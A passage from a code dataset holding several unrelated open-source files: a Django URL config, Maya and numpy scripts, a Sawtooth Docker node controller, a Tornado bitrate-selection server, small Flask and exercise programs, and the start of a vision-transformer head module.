document_views.ApplicationCompanyDocumentUpdateAPIView.as_view(),\n name=\"application-company-documents-update\"\n ),\n path(\n 'funds//company-documents/',\n document_views.ApplicationCompanyDocumentListAPIView.as_view(),\n name=\"application-company-documents\"\n ),\n re_path(\n 'funds/(?P.+)/company-documents/signing_url/(?P\\d+)',\n document_views.GetUserSigningURLAPIView.as_view(),\n name=\"application-company-documents-signing-url\"\n ),\n re_path(\n 'funds/(?P.+)/company-documents/store_response/(?P.+)',\n document_views.StoreUserSignedResponse.as_view(),\n name=\"application-company-documents-signing-url\"\n ),\n path('funds//applications', views.ApplicationListAPIView.as_view(), name=\"application-retrieve\"),\n path('funds//default', views.ApplicationDefaultsAPIView.as_view(), name=\"application-defaults\"),\n path(\n 'funds//has-pending-requests',\n views.ApplicationHasRequestedChangeAPIView.as_view(),\n name=\"has-pending-requests\"\n ),\n path(\n 'funds//state',\n views.UserApplicationStateListCreateAPIView.as_view(),\n name=\"user-fund-application-state\"\n ),\n path('', views.ApplicationCreateAPIView.as_view(), name=\"application-create\"),\n path('applications/', views.ApplicationUpdateAPIView.as_view(), name=\"application-update\"),\n path(\n 'application-document-request/',\n views.ApplicationDocumentsRequestsListView.as_view(),\n name='application-document-request-create'\n ),\n path(\n 'application-document-request-response',\n views.ApplicationDocumentRequestResponse.as_view(),\n name='application-document-request-response'\n ),\n path(\n 'application-document-request-response/',\n views.ApplicationDocumentRequestResponse.as_view(),\n name='application-document-request-response'\n ),\n path(\n 'application-document-response-delete/',\n views.ApplicationDocumentRequestResponseDestroyView.as_view(),\n name='application-document-request-response-delete'\n ),\n path(\n 'submit-changes',\n views.ApplicationSubmitChangesAPIView.as_view(),\n name='submit-changes-for-application'\n ),\n path(\n 'application-workflow-status/',\n views.ApplicationWorkflowStatusAPIView.as_view(),\n name='application-workflow-status'\n ),\n path(\n 'application-module-states/',\n views.ApplicationModuleStatesAPIView.as_view(),\n name='application-module-states'\n ),\n path(\n 'application-next-state/',\n views.ApplicationNextStateAPIView.as_view(),\n name='application-next-state'\n ),\n path('', views.ApplicationBaseUpdateAPIView.as_view(), name=\"application-base-update\"),\n]\n","repo_name":"tayyabsaleem7756/jobtest","sub_path":"backend/retail_market/api/applications/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27983775423","text":"# Program to create list and find most frequent item\n\n\nimport numpy as np\n\n\nd1 = np.random.random_integers(0, 20, 15)\n\nprint(d1)\n\nvectorlist = []\n\n# Converting array to list using tolist function\nvectorlist = d1.tolist()\n\nl = len(vectorlist)\n\n\ndef mostfreq(arr, n):\n # Sort the array\n arr.sort()\n\n # find the max frequency using\n # linear traversal\n max_count = 1;\n res = arr[0];\n curr_count = 1\n\n for i in range(1, n):\n if arr[i] == arr[i - 1]:\n curr_count += 1\n\n else:\n if curr_count > max_count:\n max_count = curr_count\n res = arr[i - 1]\n\n curr_count = 1\n\n # If last element is most frequent\n if curr_count > max_count:\n max_count = curr_count\n res = arr[n - 1]\n\n return res\n\n\nprint(mostfreq(vectorlist, l))\n","repo_name":"rnekadi/CSEE5590_PYTHON_DEEPLEARNING_FALL2018","sub_path":"ICP4/Numpy.py","file_name":"Numpy.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22780164057","text":"import os\nimport math\nfrom ldmt_function.ldmt_loadUIFile import get_maya_window, load_ui_type\nimport maya.OpenMayaUI as omui\nfrom ldmt_core import ldmt_cmds as ld\nfrom functools import partial\nimport maya.cmds as cmds\nimport maya.mel as mel\n\ntry:\n from PySide2.QtCore import * \n from PySide2.QtGui import * \n from PySide2.QtWidgets import *\n from PySide2.QtUiTools import *\n from PySide2 import __version__\n from shiboken2 import wrapInstance \nexcept ImportError:\n from PySide.QtCore import * \n from PySide.QtGui import * \n from PySide.QtUiTools import *\n from PySide import __version__\n from shiboken import wrapInstance \n\nimport maya.OpenMaya as om\nimport maya.api.OpenMaya as om2\nimport random\nimport ast\n\nLDMTPATH = ld.getPath('LDMT')\nldmt_uifile = LDMTPATH + '/ldmt_ui/ldmt_customGrouper.ui'\nldmt_list_form, ldmt_list_base = load_ui_type(ldmt_uifile)\nldmt_window_name = 'ldmt_customGrouper'\nldmt_button_name = 'btn_'+ldmt_window_name.split('_')[1]\n\n'''\n#UI\n'''\nclass ldmt_cls(ldmt_list_form, ldmt_list_base):\n def __init__(self, parent = get_maya_window()):\n super(ldmt_cls, self).__init__(parent)\n self.window_name = ldmt_window_name\n self.setupUi(self)\n self.move(QCursor.pos() + QPoint(20,20))\n # update status bar so it's not only show in help line window.\n self.setupBtn()\n self.statusbar.showMessage(ld.tag())\n self.installStartBar()\n \n def setupBtn(self):\n self.btn_depthGroupR.clicked.connect(self.depthGroupR)\n self.btn_depthGroupA.clicked.connect(self.depthGroupA)\n self.btn_randomGroup.clicked.connect(self.randomGroup)\n self.text_groupCount.setText('5')\n def getGroupCount(self):\n groupCount = self.text_groupCount.text()\n try:\n if int(groupCount)>=1:\n return int(groupCount)\n except:\n ld.msg('Please input a integer!')\n return 0\n def depthGroupR(self):\n cmds.undoInfo(ock = 1)\n sel = cmds.ls(sl=1,fl=1)\n groupCount = self.getGroupCount()\n groups = []\n start = 0\n currentCount = len(sel)\n stop = int(currentCount/groupCount)\n if groupCount == 0:\n return\n else: \n sel = self.shuffleByDepth(sel)\n group_objs = []\n currentGroupCount = groupCount\n for i in range(groupCount):\n group_objs = sel[start:stop]\n tempGroup = cmds.group(group_objs,n='randomGroup#')\n groups.append(tempGroup)\n currentCount = currentCount-(stop-start)\n start = stop\n currentGroupCount = currentGroupCount-1\n if currentGroupCount == 0:\n break\n else:\n stop = stop + int(currentCount/currentGroupCount)\n\n mainGroup = cmds.group(groups,n='randomMainGroup#')\n childGroups = cmds.listRelatives(mainGroup)\n \n for level1 in range(len(childGroups)):\n children = cmds.listRelatives(childGroups[level1])\n for level2 in range(len(childGroups)):\n jumpHardness = abs(level1-level2)\n randomBar = 0.5**(jumpHardness+1)\n if jumpHardness == 0:\n continue\n else:\n for child in children:\n if random.random() < randomBar:\n cmds.parent(child,childGroups[level2])\n cmds.select(mainGroup,r=1)\n cmds.undoInfo(cck = 1)\n\n def depthGroupA(self):\n cmds.undoInfo(ock = 1)\n sel = cmds.ls(sl=1,fl=1)\n groupCount = self.getGroupCount()\n groups = []\n start = 0\n currentCount = len(sel)\n stop = int(currentCount/groupCount)\n if groupCount == 0:\n return\n else:\n sel = self.shuffleByDepth(sel)\n group_objs = []\n currentGroupCount = groupCount\n for i in range(groupCount):\n group_objs = sel[start:stop]\n tempGroup = cmds.group(group_objs,n='randomGroup#')\n groups.append(tempGroup)\n currentCount = currentCount-(stop-start)\n start = stop\n currentGroupCount = currentGroupCount-1\n if currentGroupCount == 0:\n break\n else:\n stop = stop + int(currentCount/currentGroupCount)\n mainGroup = cmds.group(groups,n='randomMainGroup#')\n cmds.undoInfo(cck = 1)\n def randomGroup(self):\n cmds.undoInfo(ock = 1)\n sel = cmds.ls(sl=1,fl=1)\n groupCount = self.getGroupCount()\n groups = []\n start = 0\n currentCount = len(sel)\n stop = int(currentCount/groupCount)\n if groupCount == 0:\n return\n else:\n random.shuffle(sel)\n group_objs = []\n currentGroupCount = groupCount\n for i in range(groupCount):\n group_objs = sel[start:stop]\n tempGroup = cmds.group(group_objs,n='randomGroup#')\n groups.append(tempGroup)\n currentCount = currentCount-(stop-start)\n start = stop\n currentGroupCount = currentGroupCount-1\n if currentGroupCount == 0:\n break\n else:\n stop = stop + int(currentCount/currentGroupCount) \n mainGroup = cmds.group(groups,n='randomMainGroup#')\n cmds.undoInfo(cck = 1)\n\n def shuffleByDepth(self, sel):\n sel_depth = {}\n for i in sel:\n bb = cmds.polyEvaluate(i,b=1)\n sel_depth[i] = bb[2][1]\n\n sel_depth_sorted = sorted(sel_depth.iteritems(), key=lambda d:d[1])\n newSel = []\n for i in sel_depth_sorted:\n newSel.append(i[0])\n return newSel\n\n def installStartBar(self):\n allQWidgets = self.findChildren(QWidget)\n for i in allQWidgets:\n i.installEventFilter(self)\n\n def eventFilter(self, obj, event ):\n '''Connect signals on mouse over''' \n if event.type() == QEvent.Enter:\n self.oldMessage = ld.tag()\n self.statusbar.showMessage(' '+obj.statusTip(),0) \n elif event.type() == QEvent.Leave:\n self.statusbar.showMessage(' '+self.oldMessage, 0)\n pass \n event.accept()\n return False \n\n def closeEvent(self,event):\n ld.turnToolBtnOff(self,ldmt_button_name)\n cmds.deleteUI(ldmt_window_name)\n\ndef ldmt_show():\n if cmds.window(ldmt_window_name,ex=1):\n if cmds.window(ldmt_window_name,q=1,vis=1):\n cmds.window(ldmt_window_name,e=1,vis=0)\n else:\n cmds.window(ldmt_window_name,e=1,vis=1)\n else:\n ui = ldmt_cls()\n ui.show()\n\nif __name__ == '__main__':\n ldmt_show()","repo_name":"liyihuiaacc/LD_MayaToolbox2","sub_path":"ldmt_function/ldmt_customGrouper.py","file_name":"ldmt_customGrouper.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35152797577","text":"import logging\nimport os\nimport subprocess\nimport tempfile\nimport yaml\n\nfrom sawtooth.cli.exceptions import CliException\n\nfrom sawtooth.manage.node import NodeController\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass _StateEntry(object):\n def __init__(self, name, identifier, status, command):\n self.name = name\n self.identifier = identifier\n self.status = status\n self.command = command\n\n\nclass DockerNodeController(NodeController):\n\n def __init__(self, state_dir=None):\n \"\"\"\n :param state_dir (str): optionally path to state directory\n \"\"\"\n if state_dir is None:\n state_dir = os.path.join(os.path.expanduser(\"~\"),\n '.sawtooth', 'cluster')\n\n if not os.path.exists(state_dir):\n os.makedirs(state_dir)\n\n self._state_dir = state_dir\n\n self._prefix = 'sawtooth-cluster-0'\n\n def _construct_start_args(self, node_name):\n try:\n network_ls_args = ['docker', 'network', 'ls', '--filter',\n 'NAME={}'.format(self._prefix), '-q']\n network_output = subprocess.check_output(\n network_ls_args).splitlines()\n except subprocess.CalledProcessError as e:\n raise CliException(str(e))\n\n if len(network_output) == 0:\n try:\n network_args = ['docker', 'network', 'create', '-d',\n 'bridge', self._prefix]\n n_output = subprocess.check_output(network_args)\n for l in n_output.splitlines():\n LOGGER.info(l)\n except subprocess.CalledProcessError as e:\n raise CliException(str(e))\n args = ['docker-compose', '-p',\n self._prefix.replace('-', '') + node_name,\n 'up', '-d']\n\n return args\n\n def _join_args(self, args):\n formatted_args = []\n for arg in args:\n if ' ' in arg:\n formatted_args.append(\"'\" + arg + \"'\")\n else:\n formatted_args.append(arg)\n return ' '.join(formatted_args)\n\n def start(self, node_config):\n node_name = node_config.node_name\n http_port = node_config.http_port\n\n args = self._construct_start_args(node_name)\n LOGGER.debug('starting %s: %s', node_name, self._join_args(args))\n\n compose_dir = tempfile.mkdtemp()\n compose_dict = {\n 'version': '2',\n 'services': {\n 'validator': {\n 'image': 'sawtooth-validator',\n 'expose': ['40000'],\n 'networks': [self._prefix, 'default'],\n 'volumes': ['/project:/project'],\n 'container_name': self._prefix + '-' + node_name\n }\n },\n 'networks': {self._prefix: {'external': True}}\n }\n\n state_file_path = os.path.join(self._state_dir, 'state.yaml')\n state = yaml.load(file(state_file_path))\n\n # add the processors\n node_num = node_name[len('validator-'):]\n for proc in state['Processors']:\n compose_dict['services'][proc] = {\n 'image': proc,\n 'expose': ['40000'],\n 'links': ['validator'],\n 'volumes': ['/project:/project'],\n 'container_name': '-'.join([self._prefix, proc, node_num])\n }\n\n # add the host:container port mapping for validator\n http_port = http_port + 31200\n compose_dict['services']['validator']['ports'] = \\\n [str(http_port) + \":\" + str(40000)]\n\n yaml.dump(compose_dict,\n file(os.path.join(compose_dir, 'docker-compose.yaml'),\n mode='w'))\n try:\n os.chdir(compose_dir)\n output = subprocess.check_output(args)\n except subprocess.CalledProcessError as e:\n processors = state['Processors']\n # check if the docker image is built\n unbuilt = self._get_unbuilt_images(processors)\n if unbuilt:\n raise CliException(\n 'Docker images not built: {}. Try running '\n '\"sawtooth docker build {}\"'.format(\n ', '.join(unbuilt), ' '.join(unbuilt)))\n\n invalid = self._check_invalid_processors(processors)\n if invalid:\n raise CliException(\n 'No such processor: {}'.format(', '.join(invalid)))\n\n raise CliException(str(e))\n\n except OSError as e:\n if e.errno == 2:\n raise CliException(\"{}:{}\".format(str(e), args[0]))\n else:\n raise e\n\n for line in output.split('\\n'):\n if len(line) < 1:\n continue\n LOGGER.debug(\"command output: %s\", str(line))\n\n def _get_unbuilt_images(self, processors):\n processors += ['sawtooth-validator']\n built_ins = self._built_in_processor_types()\n built_images = self._get_built_images()\n\n unbuilt = [image for image in processors\n if image not in built_images and image in built_ins]\n\n return unbuilt\n\n def _check_invalid_processors(self, processors):\n built_ins = self._built_in_processor_types()\n built_images = self._get_built_images()\n\n invalid = [image for image in processors\n if image not in built_images and image not in built_ins]\n\n return invalid\n\n def _get_built_images(self):\n docker_img_cmd = ['docker', 'images', '--format', '{{.Repository}}']\n return subprocess.check_output(docker_img_cmd).split('\\n')\n\n def _built_in_processor_types(self):\n image_data_dir = os.path.join(os.path.dirname(__file__),\n os.path.pardir,\n 'cli', 'data')\n return os.listdir(image_data_dir)\n\n def stop(self, node_name):\n state_file_path = os.path.join(self._state_dir, 'state.yaml')\n state = yaml.load(file(state_file_path))\n\n node_num = node_name[len('validator-'):]\n\n processes = state['Processors'] + ['validator']\n\n containers = ['-'.join([self._prefix, proc, node_num])\n for proc in processes]\n\n for c_name in containers:\n args = ['docker', 'stop', c_name]\n LOGGER.debug('stopping %s: %s', c_name, ' '.join(args))\n\n try:\n output = subprocess.check_output(args)\n except subprocess.CalledProcessError as e:\n raise CliException(str(e))\n\n for line in output.split('\\n'):\n if len(line) < 1:\n continue\n LOGGER.debug(\"command output: %s\", str(line))\n\n args = ['docker', 'rm', c_name]\n LOGGER.debug('stopping %s: %s', c_name, ' '.join(args))\n\n try:\n output = subprocess.check_output(args)\n except subprocess.CalledProcessError as e:\n raise CliException(str(e))\n\n for line in output.split('\\n'):\n if len(line) < 1:\n continue\n LOGGER.debug(\"command output: %s\", str(line))\n if 'validator' in c_name:\n network = c_name.replace('-', '') + '_default'\n args = ['docker', 'network', 'rm', network]\n try:\n output = subprocess.check_output(args)\n except subprocess.CalledProcessError as e:\n raise CliException(str(e))\n\n for line in output.splitlines():\n if len(line) < 1:\n continue\n LOGGER.debug(\"command output: %s\", str(line))\n\n def create_genesis_block(self, node_args):\n pass\n\n def kill(self, node_name):\n self.stop(node_name)\n\n def _get_state(self):\n args = [\n 'docker',\n 'ps',\n '-a',\n '--no-trunc',\n '--format',\n '{{.Names}},{{.ID}},{{.Status}},'\n '{{.Command}}',\n '--filter',\n 'network={}'.format(self._prefix)]\n\n try:\n output = subprocess.check_output(args)\n except subprocess.CalledProcessError as e:\n raise CliException(str(e))\n except OSError as e:\n if e.errno == 2:\n raise CliException(\"{}:{}\".format(str(e),\n args[0]))\n\n entries = []\n for line in output.split('\\n'):\n if len(line) < 1:\n continue\n parts = line.split(',')\n entries.append(_StateEntry(\n name=parts[0].replace(self._prefix + '-', ''),\n identifier=parts[1],\n status=parts[2],\n command=parts[3]))\n\n return entries\n\n def get_node_names(self):\n node_names = []\n for entry in self._get_state():\n node_names.append(entry.name)\n return node_names\n\n def is_running(self, node_name):\n for entry in self._get_state():\n if node_name == entry.name:\n return entry.status.startswith(\"Up\")\n return False\n","repo_name":"vdt/sawtooth-core","sub_path":"core/sawtooth/manage/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":9320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"27201332392","text":"import tornado.ioloop\nimport tornado.web\nimport tornado.httpserver\nimport tornado.process\nimport tornado.netutil\nfrom concurrent.futures import ThreadPoolExecutor\nimport json\nimport argparse\nimport numpy as np\nimport time\nimport socket\n\nimport robustmpc\nimport pensieve\nimport hotdash\n\n\nIP_PORT = 9999\n\nS_INFO_R = 5\nS_LEN = 8\nS_ABR_INFO = 6\nS_HOT_INFO = 6\nS_BRT_INFO = 2\nS_INFO_H = S_ABR_INFO + S_HOT_INFO + S_BRT_INFO\nS_INFO_PENSIEVE = 6\nA_DIM = 6\nA_DIM_prefetch = 2\nS_INFO_bitr = 6\nS_INFO_P = 6\n\nMPC_FUTURE_CHUNK_COUNT = 5\nACTOR_LR_RATE = 0.0001\nCRITIC_LR_RATE = 0.001\nVIDEO_BIT_RATE = [300, 750, 1200, 1850, 2850, 4300] # Kbps\nBITRATE_REWARD = [1, 2, 3, 12, 15, 20]\nBUFFER_NORM_FACTOR = 10.0\nCHUNK_TIL_VIDEO_END_CAP = 48.0\nTOTAL_VIDEO_CHUNKS = 48\nM_IN_K = 1000.0\nREBUF_PENALTY = 4.3 # 1 sec rebuffering -> 3 Mbps\nSMOOTH_PENALTY = 1\nDEFAULT_QUALITY = 1 # default video quality without agent\nRANDOM_SEED = 42\nTRAIN_SEQ_LEN = 100 # take as a train batch\nMODEL_SAVE_INTERVAL = 100\nENTROPY_CHANGE_INTERVAL = 20000\nHD_REWARD = [1, 2, 3, 12, 15, 20]\nNUM_HOTSPOT_CHUNKS = 5\nBITRATE_LEVELS = 6\nDEFAULT_PREFETCH = 0 # default prefetch decision without agent\nRAND_RANGE = 1000\n\n\nclass MainHandler(tornado.web.RequestHandler):\n executor = ThreadPoolExecutor(20)\n\n def initialize(self, args, teacher):\n self.teacher = teacher\n self.args = args\n\n def post(self):\n t1 = time.time()\n env_post_data = json.loads(self.request.body)\n last_bit_rate = env_post_data['last_bit_rate']\n buffer_size = env_post_data['buffer_size']\n rebuf = env_post_data['rebuf']\n video_chunk_size = env_post_data['video_chunk_size']\n delay = env_post_data['delay']\n video_chunk_remain = env_post_data['video_chunk_remain']\n next_video_chunk_sizes = env_post_data['next_video_chunk_sizes']\n\n if self.args.abr == 'pensieve':\n state = np.zeros((S_INFO_P, S_LEN))\n state[0, -1] = VIDEO_BIT_RATE[last_bit_rate] / float(np.max(VIDEO_BIT_RATE)) # last quality\n state[1, -1] = buffer_size / BUFFER_NORM_FACTOR # 10 sec\n state[2, -1] = float(video_chunk_size) / float(delay) / M_IN_K # kilo byte / ms\n state[3, -1] = float(delay) / M_IN_K / BUFFER_NORM_FACTOR # 10 sec\n state[4, :A_DIM] = np.array(next_video_chunk_sizes) / M_IN_K / M_IN_K # mega byte\n state[5, -1] = np.minimum(video_chunk_remain, CHUNK_TIL_VIDEO_END_CAP) / float(CHUNK_TIL_VIDEO_END_CAP)\n\n bit_rate = int(self.teacher.predict(state))\n\n elif self.args.abr == 'robustmpc':\n state = np.zeros((S_INFO_R, S_LEN))\n state[0, -1] = VIDEO_BIT_RATE[last_bit_rate] / float(np.max(VIDEO_BIT_RATE)) # last quality\n state[1, -1] = buffer_size / BUFFER_NORM_FACTOR\n state[2, -1] = rebuf\n state[3, -1] = float(video_chunk_size) / float(delay) / M_IN_K # kilo byte / ms\n state[4, -1] = np.minimum(video_chunk_remain, CHUNK_TIL_VIDEO_END_CAP) / float(CHUNK_TIL_VIDEO_END_CAP)\n\n bit_rate = int(self.teacher.predict(state))\n\n elif self.args.abr == 'hotdash':\n hotspot_chunks_remain = env_post_data['hotspot_chunks_remain']\n last_hotspot_bit_rate = env_post_data['last_hotspot_bit_rate']\n next_hotspot_chunk_sizes = env_post_data['next_hotspot_chunk_sizes']\n dist_from_hotspot_chunks = env_post_data['dist_from_hotspot_chunks']\n\n state = np.zeros((S_INFO_H, S_LEN))\n state[0, -1] = VIDEO_BIT_RATE[last_bit_rate] / float(np.max(VIDEO_BIT_RATE)) # last quality\n state[1, -1] = buffer_size / BUFFER_NORM_FACTOR # 10 sec\n state[2, -1] = float(video_chunk_size) / float(delay) / M_IN_K # kilo byte / ms\n state[3, -1] = float(delay) / M_IN_K / BUFFER_NORM_FACTOR # 10 sec\n state[4, :BITRATE_LEVELS] = np.array(next_video_chunk_sizes) / M_IN_K / M_IN_K # mega byte\n state[5, -1] = np.minimum(video_chunk_remain, CHUNK_TIL_VIDEO_END_CAP) / CHUNK_TIL_VIDEO_END_CAP\n state[6, -1] = np.minimum(hotspot_chunks_remain, NUM_HOTSPOT_CHUNKS) / float(NUM_HOTSPOT_CHUNKS)\n state[7, -1] = np.minimum(video_chunk_remain, CHUNK_TIL_VIDEO_END_CAP) / CHUNK_TIL_VIDEO_END_CAP\n state[8, -1] = buffer_size / BUFFER_NORM_FACTOR\n state[9, -1] = last_hotspot_bit_rate / float(np.max(VIDEO_BIT_RATE))\n state[10, :BITRATE_LEVELS] = np.array(next_hotspot_chunk_sizes) / M_IN_K / M_IN_K\n state[11, :NUM_HOTSPOT_CHUNKS] = (np.array(\n dist_from_hotspot_chunks) + CHUNK_TIL_VIDEO_END_CAP) / 2 / CHUNK_TIL_VIDEO_END_CAP\n state[12, -1] = last_bit_rate / float(np.max(VIDEO_BIT_RATE))\n state[13, -1] = last_hotspot_bit_rate / float(np.max(VIDEO_BIT_RATE))\n\n state_info_pensieve_n = np.zeros((S_INFO_PENSIEVE, S_LEN))\n state_info_pensieve_n[0, -1] = VIDEO_BIT_RATE[last_bit_rate] / float(np.max(VIDEO_BIT_RATE))\n state_info_pensieve_n[1, -1] = buffer_size / BUFFER_NORM_FACTOR\n state_info_pensieve_n[2, -1] = float(video_chunk_size) / float(delay) / M_IN_K\n state_info_pensieve_n[3, -1] = float(delay) / M_IN_K / BUFFER_NORM_FACTOR\n state_info_pensieve_n[4, :BITRATE_LEVELS] = np.array(next_video_chunk_sizes) / M_IN_K / M_IN_K\n state_info_pensieve_n[5, -1] = np.minimum(video_chunk_remain,\n CHUNK_TIL_VIDEO_END_CAP) / CHUNK_TIL_VIDEO_END_CAP\n\n state_info_pensieve_h = np.zeros((S_INFO_PENSIEVE, S_LEN))\n state_info_pensieve_h[0, -1] = VIDEO_BIT_RATE[last_bit_rate] / float(np.max(VIDEO_BIT_RATE))\n state_info_pensieve_h[1, -1] = buffer_size / BUFFER_NORM_FACTOR # 10 sec\n state_info_pensieve_h[2, -1] = float(video_chunk_size) / float(delay) / M_IN_K\n state_info_pensieve_h[3, -1] = float(delay) / M_IN_K / BUFFER_NORM_FACTOR # 10 sec\n state_info_pensieve_h[4, :BITRATE_LEVELS] = np.array(next_hotspot_chunk_sizes) / M_IN_K / M_IN_K\n state_info_pensieve_h[5, -1] = np.minimum(video_chunk_remain,\n CHUNK_TIL_VIDEO_END_CAP) / CHUNK_TIL_VIDEO_END_CAP\n\n states_list = np.array([state, state_info_pensieve_n, state_info_pensieve_h])\n bit_rate = int(self.teacher.predict(states_list)[1])\n\n else:\n raise NotImplementedError\n\n send_data = json.dumps({\"bitrate\": bit_rate})\n self.set_status(200)\n self.set_header('Content-Type', 'text/plain')\n self.set_header('Content-Length', len(send_data))\n self.set_header('Access-Control-Allow-Origin', \"*\")\n self.write(bytes(send_data, encoding='utf-8'))\n t2 = time.time()\n print(t2 - t1)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-a', '--abr', metavar='ABR', choices=['pensieve', 'robustmpc', 'hotdash'])\n parser.add_argument('-w', '--worker', type=int, default=1)\n args = parser.parse_args()\n\n sockets = tornado.netutil.bind_sockets(IP_PORT)\n tornado.process.fork_processes(args.worker)\n if args.abr == 'pensieve':\n teacher = pensieve.Pensieve()\n elif args.abr == 'robustmpc':\n teacher = robustmpc.RobustMPC()\n elif args.abr == 'hotdash':\n teacher = hotdash.Hotdash()\n else:\n raise NotImplementedError\n application = tornado.web.Application(handlers=[(r\"/\", MainHandler, dict(args=args, teacher=teacher))],\n autoreload=False, debug=False)\n http_server = tornado.httpserver.HTTPServer(application)\n http_server.add_sockets(sockets)\n\n tornado.ioloop.IOLoop.current().start()\n","repo_name":"transys-project/pitree","sub_path":"server_tornado.py","file_name":"server_tornado.py","file_ext":"py","file_size_in_byte":7794,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"53"} +{"seq_id":"26386106476","text":"from flask import Flask,jsonify\nfrom flask.globals import request\n\napp=Flask(__name__)\n\n@app.route('/')\ndef Hello_world():\n return \"Hello World\"\n\n@app.route('/add',methods=['POST'])\ndef add():\n request_json=request.get_json()\n if \"x\" not in request_json or \"y\" not in request_json:\n return {\"status\":False,\"message\":\"variables missing in request\"},400\n return {\n \"status\":True,\n \"data\":request_json['x']+request_json['y']\n },200\n\n@app.route('/json')\ndef json():\n c={\n \"hello\":\"There\"\n }\n return c\n\nif __name__==\"__main__\":\n app.run(debug=True)","repo_name":"namansukhwani/FlaskAndDockerTraining","sub_path":"w1_w5APIS/extra_files/app_test1.py","file_name":"app_test1.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20149093934","text":"import heapq\n\ndef night_work(a, b):\n if a >= sum(b):\n return 0\n \n b = [-i for i in b]\n heapq.heapify(b)\n\n for i in range(a):\n i = heapq.heappop(b)\n i += 1\n heapq.heappush(b, i)\n \n result_1 = []\n for i in range(len(b)):\n result_1.append(-b[i])\n\n result_2 = sum([i ** 2 for i in b])\n\n return result_1, result_2\n\nif __name__ == '__main__':\n a = int(input('enter remaining work times >>'))\n b = list(map(int, input().split('enter work load >>')))\n result_1, result_2 = night_work(a, b)\n print(result_1)\n print(result_2)\n","repo_name":"jason2133/data_structure_and_algorithm","sub_path":"Assignment_3/assignment_3_3.py","file_name":"assignment_3_3.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1696261476","text":"bill = int(input(\"Please enter total bill amount: \"))\nlevel = input(\"Level of service: \")\n\nif level == \"good\":\n tip = (int(bill) * .2)\n\nelif level == \"fair\":\n tip = (int(bill) * .15)\n\nelif level == \"bad\":\n tip = (int(bill) * .1)\n\nelse:\n print(\"error\")\n\nprint(\"Tip amount: $\" + '%.2f' % float(tip))\nprint(\"Total amount: $ \" + '%.2f' % float(bill + tip))","repo_name":"zach-a-g/python1","sub_path":"python/tip_calculator.py","file_name":"tip_calculator.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19818748440","text":"from typing import Callable\n\nfrom aitemplate.compiler import ops\n\nfrom aitemplate.frontend import Tensor\nfrom aitemplate.frontend.nn.dropout import Dropout\nfrom aitemplate.frontend.nn.linear import Linear\nfrom aitemplate.frontend.nn.module import Module\nfrom aitemplate.frontend.nn.softmax import Softmax\n\n\nclass SequencePool(Module):\n \"\"\"\n Sequence pool produces a single embedding from a sequence of embeddings. Currently\n it supports \"mean\" and \"cls\".\n\n \"\"\"\n\n def __init__(self, mode: str) -> None:\n \"\"\"\n Args:\n mode (str): Optionals include \"cls\" and \"mean\". If set to \"cls\", it assumes\n the first element in the input is the cls token and returns it. If set\n to \"mean\", it returns the mean of the entire sequence.\n \"\"\"\n super().__init__()\n assert mode in [\"mean\"], \"Unsupported mode for SequencePool.\"\n self.mode = mode\n\n def forward(self, x: Tensor) -> Tensor:\n # TODO: Add support for cls mode.\n # if self.mode == \"cls\":\n # x = x[:, 0]\n if self.mode == \"mean\":\n x = ops.reduce_mean(1)(x)\n else:\n raise NotImplementedError\n return x\n\n\nclass VisionTransformerBasicHead(Module):\n \"\"\"\n Vision transformer basic head.\n\n ::\n\n SequencePool\n ↓\n Dropout\n ↓\n Projection\n ↓\n Activation\n\n\n The builder can be found in `create_vit_basic_head`.\n \"\"\"\n\n def __init__(\n self,\n sequence_pool: Module = None,\n dropout: Module = None,\n proj: Module = None,\n activation: Module = None,\n ) -> None:\n \"\"\"\n Args:\n sequence_pool (torch.nn.modules): pooling module.\n dropout(torch.nn.modules): dropout module.\n proj (torch.nn.modules): project module.\n activation (torch.nn.modules): activation module.\n \"\"\"\n super().__init__()\n self.sequence_pool = sequence_pool\n self.dropout = dropout\n self.proj = proj\n self.activation = activation\n\n def forward(self, x: Tensor) -> Tensor:\n # Performs pooling.\n if self.sequence_pool is not None:\n x = self.sequence_pool(x)\n\n # Performs dropout.\n if self.dropout is not None:\n x = self.dropout(x)\n # Performs projection.\n if self.proj is not None:\n x = self.proj(x)\n # Performs activation.\n if self.activation is not None:\n x = self.activation(x)\n return x\n\n\ndef create_vit_basic_head(\n *,\n # Projection configs.\n in_features: int,\n out_features: int,\n # Pooling configs.\n seq_pool_type: str = \"cls\",\n # Dropout configs.\n dropout_rate: float = 0.5,\n # Activation configs.\n activation: Callable = None,\n) -> Module:\n \"\"\"\n Creates vision transformer basic head.\n\n ::\n\n\n Pooling\n ↓\n Dropout\n ↓\n Projection\n ↓\n Activation\n\n\n Activation examples include: ReLU, Softmax, Sigmoid, and None.\n Pool type examples include: cls, mean and none.\n\n Args:\n\n in_features: input channel size of the resnet head.\n out_features: output channel size of the resnet head.\n\n pool_type (str): Pooling type. It supports \"cls\", \"mean \" and \"none\". If set to\n \"cls\", it assumes the first element in the input is the cls token and\n returns it. If set to \"mean\", it returns the mean of the entire sequence.\n\n activation (callable): a callable that constructs vision transformer head\n activation layer, examples include: nn.ReLU, nn.Softmax, nn.Sigmoid, and\n None (not applying activation).\n\n dropout_rate (float): dropout rate.\n \"\"\"\n assert seq_pool_type in [\"cls\", \"mean\", \"none\"]\n\n if seq_pool_type in [\"cls\", \"mean\"]:\n seq_pool_model = SequencePool(seq_pool_type)\n elif seq_pool_type 